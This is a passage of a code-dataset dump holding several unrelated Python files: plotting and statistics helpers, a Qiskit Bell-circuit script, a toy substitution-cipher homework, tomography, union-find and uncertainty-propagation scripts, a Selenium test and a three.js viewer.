I.\", \"Közepes II.\", \"Nagy\"]\n fig.add_trace(go.Scatter(y= x_val, x=retro,name=\"Retrográd\",mode='markers'))\n fig.add_trace(go.Scatter(y= x_val, x=cros,name=\"Keresztpálya\",mode='markers'))\n\n\n fig.update_layout(\n yaxis_tickformat = 'eBit/s'\n ,\n xaxis=dict(\n title=\"Átlagos másodpercenként átvitt összefonódott kvantumbitek\",\n \n ),\n width=1000,\n )\n\n #fig.show()\n fig.write_image(f\"agreg.jpeg\",scale=3)\n\nfor child in Path('.').iterdir():\n if child.is_dir():\n for child2 in Path(\"./\"+child.name).iterdir(): \n if child2.is_file() and child2.name.__contains__(\".csv\"):\n print(f\"{child}\\n\")\n if child.name.__contains__(\"CROS\"):\n cros.append(generateAgreg(child2))\n else:\n retro.append(generateAgreg(child2))\n\nprint(retro)\nprint(cros)\nvisu(retro,cros)","sub_path":"src/Data/Output/csvTolatex.py","file_name":"csvTolatex.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"123996294","text":"\"\"\"Analysis visualization functions\n\"\"\"\n\nimport numpy as np\nfrom itertools import chain\ntry:\n import matplotlib.pyplot as plt\n from matplotlib import rcParams\nexcept ImportError:\n plt = None\ntry:\n from pandas.core.frame import DataFrame\nexcept ImportError:\n DataFrame = None\n\nfrom .._utils import string_types\n\n\ndef format_pval(pval, latex=True, scheme='default'):\n \"\"\"Format a p-value using one of several schemes.\n\n Parameters\n ----------\n pval : float | array-like\n The raw p-value(s).\n latex : bool\n Whether to use LaTeX wrappers suitable for use with matplotlib.\n scheme : str\n A keyword indicating the formatting scheme. Currently supports \"ross\"\n and \"default\"; any other string will yield the same as \"default\".\n\n Returns\n -------\n pv : str | np.objectarray\n A string or array of strings of formatted p-values. If a list output is\n preferred, users may call ``.tolist()`` on the output of the function.\n \"\"\"\n single_value = False\n if np.array(pval).shape == ():\n single_value = True\n pval = np.atleast_1d(np.asanyarray(pval))\n # add a tiny amount to handle cases where p is exactly a power of ten\n pval = pval + np.finfo(pval.dtype).eps\n expon = np.trunc(np.log10(pval)).astype(int) # exponents\n pv = np.zeros_like(pval, dtype=object)\n if latex:\n wrap = '$'\n brac = '{{'\n brak = '}}'\n else:\n wrap = ''\n brac = ''\n brak = ''\n if scheme == 'ross': # (exact value up to 4 decimal places)\n pv[pval >= 0.0001] = [wrap + 'p = {:.4f}'.format(x) + wrap\n for x in pval[pval > 0.0001]]\n pv[pval < 0.0001] = [wrap + 'p < 10^' + brac + '{}'.format(x) + brak +\n wrap for x in expon[pval < 0.0001]]\n else: # scheme == 'default'\n pv[pval >= 0.05] = wrap + 'n.s.' + wrap\n pv[pval < 0.05] = wrap + 'p < 0.05' + wrap\n pv[pval < 0.01] = wrap + 'p < 0.01' + wrap\n pv[pval < 0.001] = wrap + 'p < 0.001' + wrap\n pv[pval < 0.0001] = [wrap + 'p < 10^' + brac + '{}'.format(x) + brak +\n wrap for x in expon[pval < 0.0001]]\n if single_value:\n pv = pv[0]\n return(pv)\n\n\ndef barplot(h, axis=-1, ylim=None, err_bars=None, lines=False, groups=None,\n eq_group_widths=False, brackets=None, bracket_text=None,\n gap_size=0.2, bar_names=None, group_names=None, bar_kwargs=None,\n err_kwargs=None, line_kwargs=None, bracket_kwargs=None,\n figure_kwargs=None, smart_defaults=True, fname=None, ax=None):\n \"\"\"Makes barplots w/ optional line overlays, grouping, & signif. brackets.\n\n Parameters\n ----------\n h : array-like\n If ``h`` is 2-dimensional, heights will be calculated as means along\n the axis given by ``axis``. If ``h`` is of lower dimension, it is\n treated as raw height values. If ``h`` is a pandas ``DataFrame`` and\n ``bar_names`` is None, ``bar_names`` will be inferred from the\n ``DataFrame``'s ``column`` labels (if ``axis=0``) or ``index`` labels.\n axis : int\n The axis along which to calculate mean values to determine bar heights.\n Ignored if ``h`` is 0- or 1-dimensional.\n ylim : tuple | None\n y-axis limits passed to ``matplotlib.pyplot.subplot.set_ylim()``.\n err_bars : str | array-like | None\n Type of error bars to be added to the barplot. Possible values are\n ``'sd'`` for sample standard deviation, ``'se'`` for standard error of\n the mean, or ``'ci'`` for 95% confidence interval. If ``None``, no\n error bars will be plotted. Custom error bar heights are possible by\n passing an array-like object; in such cases ``err_bars`` must have the\n same dimensionality and shape as ``h``.\n lines : bool\n Whether to plot within-subject data as lines overlaid on the barplot.\n groups : list | None\n List of lists containing the integers in ``range(num_bars)``, with\n sub-lists indicating the desired grouping. For example, if ``h`` has\n has shape (10, 4) and ``axis = -1`` then \"num_bars\" is 4; if you want\n the first bar isolated and the remaining three grouped, then specify\n ``groups=[[0], [1, 2, 3]]``.\n eq_group_widths : bool\n Should all groups have the same width? If ``False``, all bars will have\n the same width. Ignored if ``groups=None``, since the bar/group\n distinction is meaningless in that case.\n brackets : list of tuples | None\n Location of significance brackets. Scheme is similar to ``grouping``;\n if you want a bracket between the first and second bar and another\n between the third and fourth bars, specify as [(0,1),(2,3)]. If you\n want brackets between groups of bars instead of between bars, indicate\n the group numbers as singleton lists within the tuple: [([0], [1])].\n bracket_text : str | list | None\n text to display above brackets.\n gap_size : float\n Width of the gap between groups (if ``eq_group_width = True``) or\n between bars, expressed as a proportion [0,1) of group or bar width.\n bar_names : array-like | None\n Optional axis labels for each bar.\n group_names : array-like | None\n Optional axis labels for each group.\n bar_kwargs : dict\n Arguments passed to ``matplotlib.pyplot.bar()`` (ex: color, linewidth).\n err_kwargs : dict\n Arguments passed to ``matplotlib.pyplot.bar(error_kw)`` (ex: ecolor,\n capsize).\n line_kwargs : dict\n Arguments passed to ``matplotlib.pyplot.plot()`` (e.g., color, marker,\n linestyle).\n bracket_kwargs : dict\n arguments passed to ``matplotlib.pyplot.plot()`` (e.g., color, marker,\n linestyle).\n figure_kwargs : dict\n arguments passed to ``matplotlib.pyplot.figure()`` (e.g., figsize, dpi,\n frameon).\n smart_defaults : bool\n Whether to use pyplot default colors (``False``), or something more\n pleasing to the eye (``True``).\n fname : str | None\n Path and name of output file. Type is inferred from ``fname`` and\n should work for any of the types supported by pyplot (pdf, eps,\n svg, png, raw).\n ax : matplotlib.pyplot.axes | None\n A ``matplotlib.pyplot.axes`` instance. If none, a new figure with a\n single subplot will be created.\n\n Returns\n -------\n p : handle for the ``matplotlib.pyplot.subplot`` instance.\n b : handle for the ``matplotlib.pyplot.bar`` instance.\n\n Notes\n -----\n Smart defaults sets the following parameters:\n bar color: light gray (70%)\n error bar color: black\n line color: black\n bracket color: dark gray (30%)\n \"\"\"\n # check matplotlib\n if plt is None:\n raise ImportError('Barplot requires matplotlib.pyplot.')\n # be nice to pandas\n if DataFrame is not None:\n if isinstance(h, DataFrame) and bar_names is None:\n if axis == 0:\n bar_names = h.columns.tolist()\n else:\n bar_names = h.index.tolist()\n # check arg errors\n if gap_size < 0 or gap_size >= 1:\n raise ValueError('Barplot argument \"gap_size\" must be in the range '\n '[0, 1).')\n if err_bars is not None:\n if isinstance(err_bars, string_types) and \\\n err_bars not in ['sd', 'se', 'ci']:\n raise ValueError('err_bars must be \"sd\", \"se\", or \"ci\" (or an '\n 'array of error bar magnitudes).')\n # handle single-element args\n if isinstance(bracket_text, string_types):\n bracket_text = [bracket_text]\n if isinstance(group_names, string_types):\n group_names = [group_names]\n # arg defaults\n if bar_kwargs is None:\n bar_kwargs = dict()\n if err_kwargs is None:\n err_kwargs = dict()\n if line_kwargs is None:\n line_kwargs = dict()\n if bracket_kwargs is None:\n bracket_kwargs = dict()\n if figure_kwargs is None:\n figure_kwargs = dict()\n # user-supplied Axes\n if ax is not None:\n bar_kwargs['axes'] = ax\n # smart defaults\n if smart_defaults:\n if 'color' not in bar_kwargs.keys():\n bar_kwargs['color'] = '0.7'\n if 'color' not in line_kwargs.keys():\n line_kwargs['color'] = 'k'\n if 'ecolor' not in err_kwargs.keys():\n err_kwargs['ecolor'] = 'k'\n if 'color' not in bracket_kwargs.keys():\n bracket_kwargs['color'] = '0.3'\n # parse heights\n h = np.array(h)\n if len(h.shape) > 2:\n raise ValueError('Barplot \"h\" must have 2 or fewer dimensions.')\n elif len(h.shape) < 2:\n heights = np.atleast_1d(h)\n two_d = False\n else:\n heights = h.mean(axis=axis)\n two_d = True\n # grouping\n num_bars = len(heights)\n if groups is None:\n groups = [[x] for x in range(num_bars)]\n num_groups = len(groups)\n if eq_group_widths:\n group_widths = [1 - gap_size for _ in range(num_groups)]\n group_edges = [x + gap_size for x in range(num_groups)]\n bar_widths = [[(1 - gap_size) / len(x) for _ in enumerate(x)]\n for x in groups]\n bar_edges = [[gap_size / 2 + grp + (1 - gap_size) * bar / len(x) for\n bar, _ in enumerate(x)] for grp, x in enumerate(groups)]\n else:\n bar_widths = [[1 - gap_size for _ in x] for x in groups]\n bar_edges = [[gap_size / 2 + grp * gap_size + (1 - gap_size) * bar for\n bar in x] for grp, x in enumerate(groups)]\n group_widths = [np.sum(x) for x in bar_widths]\n group_edges = [x[0] for x in bar_edges]\n\n bar_edges = list(chain.from_iterable(bar_edges))\n bar_widths = list(chain.from_iterable(bar_widths))\n bar_centers = np.array(bar_edges) + np.array(bar_widths) / 2\n group_centers = np.array(group_edges) + np.array(group_widths) / 2\n # calculate error bars\n if err_bars is not None:\n if two_d:\n if err_bars == 'sd': # sample standard deviation\n err = h.std(axis=axis)\n elif err_bars == 'se': # standard error\n h.shape[axis]\n err = h.std(axis) / np.sqrt(h.shape[axis])\n else: # 95% conf int\n err = 1.96 * h.std(axis) / np.sqrt(h.shape[axis])\n else: # two_d == False\n if isinstance(err_bars, string_types):\n raise ValueError('string arguments to \"err_bars\" ignored when '\n '\"h\" has fewer than 2 dimensions.')\n else:\n err_bars = np.atleast_1d(err_bars)\n if not h.shape == err_bars.shape:\n raise ValueError('When \"err_bars\" is array-like it must '\n 'have the same shape as barplot arg \"h\".')\n err = err_bars\n bar_kwargs['yerr'] = err\n else: # still must define err (for signif. brackets)\n err = np.zeros(num_bars)\n # plot (bars and error bars)\n if ax is None:\n plt.figure(**figure_kwargs)\n p = plt.subplot(1, 1, 1)\n else:\n p = ax\n b = p.bar(bar_edges, heights, bar_widths, error_kw=err_kwargs,\n **bar_kwargs)\n # within-subject lines\n if two_d:\n max_pts = np.max(h, axis)\n else:\n max_pts = heights\n if lines:\n if axis == 0:\n xy = [(bar_centers, hts) for hts in h]\n else:\n xy = [(bar_centers, hts) for hts in h.T]\n for subj in xy:\n p.plot(subj[0], subj[1], **line_kwargs)\n else:\n max_pts.fill(0)\n # significance brackets\n apices = np.max(np.r_[np.atleast_2d(heights + err),\n np.atleast_2d(max_pts)], axis=0)\n group_apices = [np.max(apices[x]) for x in groups]\n if brackets is not None:\n if not len(brackets) == len(bracket_text):\n raise ValueError('Mismatch between number of brackets and bracket '\n 'labels.')\n brk_offset = np.diff(p.get_ylim()) * 0.025\n brk_height = np.diff(p.get_ylim()) * 0.05\n for pair, text in zip(brackets, bracket_text):\n if len(pair) != 2:\n raise ValueError('brackets must be list of 2-element tuples.')\n ylo = []\n xlr = []\n for br in pair:\n if hasattr(br, 'append'): # it's a group, not a single bar\n br = br[0]\n xlr.append(group_centers[br])\n ylo.append(group_apices[br] + brk_offset)\n gbr = (bar_centers[groups[br][0]],\n bar_centers[groups[br][-1]])\n p.plot(gbr, (ylo[-1], ylo[-1]), **bracket_kwargs)\n else:\n xlr.append(bar_centers[br])\n ylo.append(apices[br] + brk_offset)\n yhi = max(ylo) + brk_height\n # points defining brackets\n lbr = ((xlr[0], xlr[0]), (ylo[0], yhi))\n rbr = ((xlr[1], xlr[1]), (ylo[1], yhi))\n hbr = (tuple(xlr), (yhi, yhi))\n for x, y in [lbr, rbr, hbr]:\n p.plot(x, y, **bracket_kwargs)\n # bracket text\n txt = p.annotate(text, (np.mean(xlr), yhi + brk_offset/2.),\n xytext=(0, 1), textcoords='offset points',\n ha='center', annotation_clip=False)\n txt.set_bbox(dict(facecolor='w', alpha=0, boxstyle='round, pad=1'))\n plt.draw()\n txtb = txt.get_bbox_patch().get_window_extent()\n txtbb = p.transData.inverted().transform(txtb).ravel()[-1]\n ybnd = p.get_ybound()\n if txtbb > ybnd[-1]:\n p.set_ybound(ybnd[0], txtbb)\n # annotation\n box_off(p)\n p.tick_params(axis='x', length=0, pad=12)\n p.xaxis.set_ticks(bar_centers)\n if bar_names is not None:\n p.xaxis.set_ticklabels(bar_names, va='baseline')\n if group_names is not None:\n yoffset = -3 * rcParams['font.size']\n for gn, gp in zip(group_names, group_centers):\n p.annotate(gn, xy=(gp, 0), xytext=(0, yoffset),\n textcoords='offset points', ha='center', va='baseline')\n # axis limits\n p.set_xlim(0, bar_edges[-1] + bar_widths[-1] + gap_size / 2)\n if ylim is not None:\n p.set_ylim(ylim)\n # output file\n if fname is not None:\n from os.path import splitext\n fmt = splitext(fname)[-1][1:]\n plt.savefig(fname, format=fmt, transparent=True)\n # return handles for subplot and barplot instances\n plt.draw()\n return (p, b)\n\n\ndef box_off(ax):\n \"\"\"Remove the top and right edges of a plot frame, and point ticks outward.\n Parameter\n ---------\n ax : matplotlib.axes.Axes\n A matplotlib plot or subplot object.\n \"\"\"\n ax.get_xaxis().tick_bottom()\n ax.get_yaxis().tick_left()\n ax.tick_params(axis='x', direction='out')\n ax.tick_params(axis='y', direction='out')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n\n\ndef plot_screen(screen, ax=None):\n \"\"\"Plot a captured screenshot\n\n Parameters\n ----------\n screen : array\n The N x M x 3 (or 4) array of screen pixel values.\n ax : matplotlib Axes | None\n If provided, the axes will be plotted to and cleared of ticks.\n If None, a figure will be created.\n\n Retruns\n -------\n ax : matplotlib Axes\n The axes used to plot the image.\n \"\"\"\n screen = np.array(screen)\n if screen.ndim != 3 or screen.shape[2] not in [3, 4]:\n raise ValueError('screen must be a 3D array with 3 or 4 channels')\n if ax is None:\n plt.figure()\n ax = plt.axes([0, 0, 1, 1])\n ax.imshow(screen)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.box('off')\n return ax\n","sub_path":"expyfun/analyze/_viz.py","file_name":"_viz.py","file_ext":"py","file_size_in_byte":15942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"279298270","text":"print('Loading dependencies .. ', end='', flush=True)\nfrom qiskit import IBMQ, QuantumCircuit, execute, assemble, transpile\nfrom dotenv import load_dotenv\nimport matplotlib\nimport os\nprint('done')\n\nSAVEDIR = 'plots/'\nCIRCUIT_FILENAME = 'circuit.png'\n\ndef load_api_token():\n load_dotenv()\n API_TOKEN = os.getenv('API_TOKEN')\n IBMQ.save_account(API_TOKEN)\n\ndef run_on_ibmq(draw=False, waitForResult=False, backend='ibmq_burlington'):\n print('Loading account .. ', end='', flush=True)\n provider = IBMQ.load_account()\n print('done')\n backend = getattr(provider.backends, backend)\n circuit = define_circuit(draw)\n\n print('Transpiling .. ', end='')\n transpiled = transpile(circuit, backend)\n print('done')\n print('Assembling .. ', end='')\n qobj = assemble(transpiled, backend, shots=1000)\n print('done')\n exit()\n print(f'Sending to {backend} .. ', end='')\n job = backend.run(qobj)\n print('done')\n if waitForResult:\n print(f'Waiting for result .. ', end='', flush=True)\n delayed_result = backend.retrieve_job(job.job_id()).result()\n delayed_counts = delayed_result.get_counts()\n print('done')\n print(f'\\nTotal counts: {delayed_counts}')\n else:\n print(f'\\nJob ID: {job.job_id()}')\n\ndef define_circuit(draw):\n print('Creating circuit .. ', end='')\n circuit = QuantumCircuit(2, 2)\n # Add a H gate on qubit 0\n circuit.h(0)\n # Add a CX (CNOT) gate on control qubit 0 and target qubit 1\n circuit.cx(0, 1)\n # Map the quantum measurement to the classical bits\n circuit.measure([0,1], [0,1])\n print('done\\n')\n\n if draw:\n print('Circuit:')\n print(circuit.draw('text'))\n circuit.draw('mpl')\n print(f'Saving circuit to {CIRCUIT_FILENAME} .. ', end='')\n if not os.path.exists(SAVEDIR):\n os.mkdir(SAVEDIR)\n\n matplotlib.pyplot.savefig('plots/circuit.png')\n print('done\\n')\n return circuit\n\nif __name__ == '__main__':\n # load_api_token()\n run_on_ibmq(draw=True, waitForResult=True, backend='ibmq_london')\n","sub_path":"HW2/test_ibmq.py","file_name":"test_ibmq.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"649442734","text":"class SingletonClass:\n\n __instance = None\n def __new__(cls):\n if not cls.__instance:\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\ninstance1 = SingletonClass()\ninstance2 = SingletonClass()\n\nprint(id(instance1), id(instance2), instance1 is instance2)","sub_path":"implements/python/01_creational_patterns/singleton_pattern_1.py","file_name":"singleton_pattern_1.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"10654759","text":"\n'''Dato un testo da codificare ed una chiave si propone il seguente schema crittografico:\n\n- dalla chiave vengono eliminati tutti i caratteri C per cui C<'a' o C>'z'. \n- di ciascuno dei caratteri restanti vengono cancellate dalla chiave tutte le occorrenze \n tranne l'ultima, ottenendo una sequenza DISORDINATA. \n- i caratteri presenti nella stringa cosi' ripulita saranno i soli caratteri del testo \n ad essere codificati ovvero sostituiti nel testo crittografato (gli altri resteranno invariati). \n- la sequenza ORDINATA dei caratteri rimasti nella chiave viene messa in corrispondenza \n con la sequenza DISORDINATA dei caratteri ottenuti al passo precedente.\n\nCome esempio di applicazione consideriamo la chiave\n \"sim sala Bim!\"\na seguito delle eliminazioni la chiave produce la sequenza DISORDINATA\n \"slaim\"\n \nI soli caratteri del testo a subire una codifica sarano 's','l', 'a' 'i' ed 'm'. \nPer sapere con cosa verranno codificati questi caratteri si considera la seguente corrispondenza\ntra sequenze: sort!\n \"ailms\" (sequenza ordinata degli stessi caratteri)\n \"slaim\" (sequenza disordinata ottenuta dalla chiave)\nquesto determina gli accoppiamenti (a,s), (i,l) (l,a), (m,i) ed (s,m)\nla 'a' dunque sara' codificata con 's', la 'i' con 'l' e cosi' via.\n\nUtilizzando la chiave \"sim sala Bim!\" per codificare il testo \"il mare sa di sale\" si \n otterra' il seguente testo crittografato:\n \"il mare sa di sale\" (testo in chiaro)\n \"la isre ms dl msae\" (testo crittografato)\n\nLa decodifica del testo crittografato opera sulla stessa chive ma sostituisce le lettere\npresenti nella sequenza disordinata con quelle della sequenza ordinata.\nQuindi nell'esempio precedente le sostituzioni sono invertite:\n (s, a), (l, i) (a, l), (i, m) ed (m, s)\n\nPer altri esempi vedere il file grade03.txt\n\nImplementate le due funzioni\n codifica(chiave, testo_in_chiaro) -> testo_crittografato\n decodifica(chiave, testo_crittografato) -> testo_in_chiaro\n\nATTENZIONE: NON USATE LETTERE ACCENTATE.\nATTENZIONE: Se il grader non termina entro 30 secondi il punteggio dell'esercizio e' zero.\n'''\ndisordinata = []\nordinata = []\n\ndef codifica(chiave, testo):\n '''inserire qui la vostra implementazione'''\n global disordinata\n global ordinata\n \n disordinata = []\n ordinata = []\n \n temp = []\n for char in chiave: # pulire la stringa dai caratteri non permissibili [A-Z] U {caratteri speciali}\n if not(ord(char) < ord('a') or ord(char) > ord('z')):\n temp.append(char)\n \n for c in reversed(temp):\n if not c in disordinata:\n disordinata.append(c)\n \n disordinata = disordinata[::-1] # qui si trova la sequenza disordinata dei caratteri da codificare nel plaintext\n \n ordinata = disordinata.copy()\n ordinata.sort() # qui si trova la lista ordinata dei caratteri\n \n cyphertext = []\n for char in testo:\n if not char in ordinata:\n cyphertext.append(char)\n else:\n indice_char = ordinata.index(char)\n cyphertext.append(disordinata[indice_char])\n \n testo_crittografato = ''.join(cyphertext)\n return testo_crittografato\n \n\ndef decodifica(chiave, testo):\n '''inserire qui la vostra implementazione'''\n global disordinata\n global ordinata\n \n plaintext = []\n for char in testo:\n if not char in disordinata:\n plaintext.append(char)\n else:\n indice_char = disordinata.index(char)\n plaintext.append(ordinata[indice_char])\n\n testo_in_chiaro = ''.join(plaintext) \n return testo_in_chiaro\n \n","sub_path":"students/1802430/homework01/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"400007557","text":"import tomopy\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyqtgraph as pg\nfrom tomoCam import gpuGridrec\n\nnum_slice = 50\nim_size = 512 #2560 #A n X n X n volume\nsino_center = im_size/2#1280\nnum_angles = 512 #1024\ngpu_device = 2\noversamp_factor=1.5\nnum_iter = 150\np=1.2\nsigma=.1\n\n\n\nobj = tomopy.shepp3d((num_slice,im_size,im_size)) # Generate an object.\ntheta = tomopy.angles(num_angles) # Generate uniformly spaced tilt angles.\npg.image(obj);pg.QtGui.QApplication.exec_()\n### Comparing to tomopy \ntomo = tomopy.project(obj,theta)\nproj_dim = tomo.shape[2]\ntomo= tomo[:,:,proj_dim/2-im_size/2:proj_dim/2+im_size/2]\npg.image(tomo);pg.QtGui.QApplication.exec_()\n################## GPU MBIR ######################\ninput_params={}\ninput_params['gpu_device']=gpu_device\ninput_params['oversamp_factor']=oversamp_factor\ninput_params['num_iter']=num_iter\ninput_params['fbp_filter_param']=0.5\nt=time.time()\nrec_gridrec = gpuGridrec(tomo,theta,sino_center,input_params)\nelapsed_time = (time.time()-t)\nprint('Time for reconstucting using GPU-Gridrec of %d slices: %f' % (num_slice,elapsed_time))\npg.image(rec_gridrec/(num_angles*im_size));pg.QtGui.QApplication.exec_()\n","sub_path":"python_2D/test_Gridrec.py","file_name":"test_Gridrec.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"618144880","text":"def int_lst_input():\n return [int(val) for val in input().split(' ')]\n\ndef int_input():\n return int(input())\n\ndef print_lst(lst):\n print(' '.join([str(val) for val in lst]))\n\ndef solve():\n q = int_input()\n for i in range(q):\n n = int_input()\n\n seen = set()\n\n count = 0\n\n while n > 0 and n not in seen:\n seen.add(n)\n\n if n % 5 == 0:\n n = 4 * n // 5\n elif n % 3 == 0:\n n = 2 * n // 3\n elif n % 2 == 0:\n n = n // 2\n else:\n break\n\n count += 1\n\n if n == 1:\n print(count)\n else:\n print(-1)\n\nif __name__ == '__main__':\n solve()\n","sub_path":"1176A_divide_it.py","file_name":"1176A_divide_it.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"463207750","text":"def MakeSet(i, parent):\n parent[i] = i\n\ndef Find(i, parent):\n while i != parent[i]:\n i = parent[i]\n return i\n\ndef Merge(i, j, parent, rank):\n i_id, j_id = Find(i, parent), Find(j, parent)\n if i_id == j_id:\n return\n if rank[i_id] > rank[j_id]:\n parent[j_id] = i_id\n rank[i_id] += rank[j_id]\n else:\n parent[i_id] = j_id\n rank[j_id] += rank[i_id]\n\n\n\nn, m = map(int, input().split())\nrank = list(map(int, input().split()))\narray = [i for i in range(0, n)]\nfor i in range(0, n):\n MakeSet(i, array)\nfor _ in range(m):\n i, j = map(int, input().split())\n print(array)\n Merge(i - 1, j - 1, array, rank)\n #print(i, j)\n print(rank[Find(j, parent=array)])\n #print(rank)","sub_path":"Week2/merging_tables/training_with_sets.py","file_name":"training_with_sets.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"75633949","text":"# made with heart by Gregor Zunic\n\nfrom sympy import *\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom decimal import Decimal\n\n'''\nizracun nagotovsti v enacbah\n\ntreba je installat:\n\npip install sympy, numpy, matplotlib\n\nkt v Projekt Tomo se spreminja samo stvari k so med ## ##\n'''\n\n####################################################################\n####################################################################\n\n# to je samo vizualno da se vid kaj se za rezultat dubi\nracunamo = 'k'\n\n# stevilo racunskih mest pri koncnem rezultatu (output)\nnatancnost_mest = 3\n\n# vazn samo za koncn output, za velikost texta\ntext_size = 20\n\n# za vsak simbol k se ga uporab v enacbi (function) je treba narest symbol (lahko je z latex formatingom, samo more bit r'')\nro, d1, d2 = symbols(r'\\rho d_1 d_2')\n\n# za vsako neznanko nrdimo tuple, (x, []) prvi el v listu je velikost neznanke, drugi el je napaka\ndata = [\n (ro, [13000, 0]),\n (d1, [0.006, 0.00001]),\n (d2, [0.0128, 0.1*10**-6])\n]\n\n# tuki se definira funkcijo, lahko se uporabla use funkcije eg. sin(), ln() iz numpy-ja in sympy-ja\nfunction = ro*(1/(pi*d2**2)**2-1/(pi*d1**2)**2)/2\n\n####################################################################\n####################################################################\n\n# ne spreminjat, mislm lah ampak se lah kej breaka\n\n\ndef format_text(num):\n return str(f'%.{natancnost_mest}E' % num).replace('+', '')\n\n\nvalues = [(x[0], x[1][0]) for x in data]\n\nresults = []\nformated_results = []\n\nfor el in data:\n deriv = Derivative(function, el[0])\n res = deriv.doit()\n deltaa = el[1][1]\n error = (float(deriv.doit().subs(values) * deltaa))\n latfunc = '$'+latex(res)+'$'\n results.append((latfunc, deltaa, error))\n formated_results.append((latfunc, deltaa, format_text(error)))\n\n\nvrednost_f = float(function.doit().subs(values))\n\nfinal_error = sqrt(sum([abs(float(x[2])**2) for x in results]))\n\nif not text_size:\n text_size = 15\n\ncolumns = [r'$\\frac{\\partial %s}{\\partial x_i}$' % racunamo,\n r'$\\sigma_i$', r'$\\sigma_i \\cdot \\frac{\\partial %s}{\\partial x_i}$' % racunamo]\nrows = ['$'+str(x[0])+'$' for x in data]\n\nplt.title('Negotovost za funkcijo')\n\nplt.xticks([])\nplt.yticks([])\n\nplt.subplots_adjust(left=0.03, bottom=0, right=0.97, top=0.94)\n\nplt.axis('off')\n\ntable = plt.table(cellText=formated_results, loc='center left',\n rowLabels=rows, colLabels=columns)\n\nplt.text(0.35, 0.9, '$'+racunamo+'=' +\n latex(function)+'$', fontsize=text_size+5)\ntable.set_fontsize(text_size)\ntable.scale(1, 3)\ntable.auto_set_font_size(False)\n\n\nlatex_vrednost = format_text(vrednost_f)\nlatex_error = format_text(final_error)\n\nprint(latex_vrednost, '+-', latex_error)\n\nplt.text(0.02, 0.1, r'$'+racunamo+' = ' + latex_vrednost + ' \\pm ' +\n latex_error + '$', fontsize=text_size+4)\n\n\nplt.show()\n","sub_path":"fizikalni_praktikum/tabela_negotovosti.py","file_name":"tabela_negotovosti.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"97129060","text":"import sys\nimport unittest\nfrom selenium import webdriver\n\n\nclass SearchProducts(unittest.TestCase):\n PLATFORM = 'LINUX'\n BROWSER = 'chrome'\n SAUCE_USERNAME = 'torch_v'\n SAUCE_KEY = 'a0027258-2d07-409d-821e-0891129550ef'\n\n def setUp(self):\n desired_caps = {'platform': self.PLATFORM, 'browserName': self.BROWSER}\n sauce_string = self.SAUCE_USERNAME + ':' + self.SAUCE_KEY\n\n self.driver = webdriver.\\\n Remote('http://' + sauce_string +\n '@ondemand.saucelabs.com:80/wd/hub', desired_caps)\n self.driver.implicitly_wait(10)\n self.driver.maximize_window()\n self.driver.get('http://demo-store.seleniumacademy.com/')\n\n def test_search_by_category(self):\n # get the search textbox\n self.search_filed = self.driver.find_element_by_name('q')\n self.search_filed.click()\n\n # enter search keyword and submit\n self.search_filed.send_keys('phones')\n self.search_filed.submit()\n\n # get all the anchor elements which have prouct names displayed\n # currently on result page using find_elements_by_xpath method\n products = self.driver.\\\n find_elements_by_xpath('//h2[@class=\\'product-name\\']/a')\n\n # check count of products shown in results\n self.assertEqual(3, len(products))\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n SearchProducts.BROWSER = sys.argv.pop()\n SearchProducts.PLATFORM = sys.argv.pop()\n unittest.main(verbosity=2)\n","sub_path":"chapter_6/sauce_test.py","file_name":"sauce_test.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"266503490","text":"import numpy as np\nimport ipywidgets as widgets\nfrom ipywidgets import HTML, Text, Output, VBox, HBox, interact\nfrom pythreejs import *\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\n\n# Helper functions\ndef get_colors(inp, colormap=\"viridis\", normalize=True, vmin=None, vmax=None):\n colormap = plt.cm.get_cmap(colormap)\n if normalize:\n vmin=np.min(inp)\n vmax=np.max(inp)\n\n norm = plt.Normalize(vmin, vmax)\n return colormap(norm(inp))[:, :3]\n\ndef gen_checkers(n_checkers_x, n_checkers_y, width=256, height=256): \n # tex dims need to be power of two.\n array = np.ones((width, height, 3), dtype='float32')\n\n # width in texels of each checker\n checker_w = width / n_checkers_x\n checker_h = height / n_checkers_y\n\n for y in range(height):\n for x in range(width):\n color_key = int(x / checker_w) + int(y / checker_h)\n if color_key % 2 == 0:\n array[x, y, :] = [ 1., 0.874, 0.0 ]\n else:\n array[x, y, :] = [ 0., 0., 0. ]\n return array\n\nclass Viewer():\n def __init__(self, settings):\n self.__update_settings(settings)\n self._light = DirectionalLight(color='white', position=[0, 0, 1], intensity=0.6)\n self._light2 = AmbientLight(intensity=0.5)\n self._cam = PerspectiveCamera(position=[0, 0, 1], lookAt=[0, 0, 0], fov=self.__s[\"fov\"], \n aspect=self.__s[\"width\"]/self.__s[\"height\"], children=[self._light])\n self._orbit = OrbitControls(controlling=self._cam)\n self._scene = Scene(children=[self._cam, self._light2], background=self.__s[\"background\"])#\"#4c4c80\"\n self._renderer 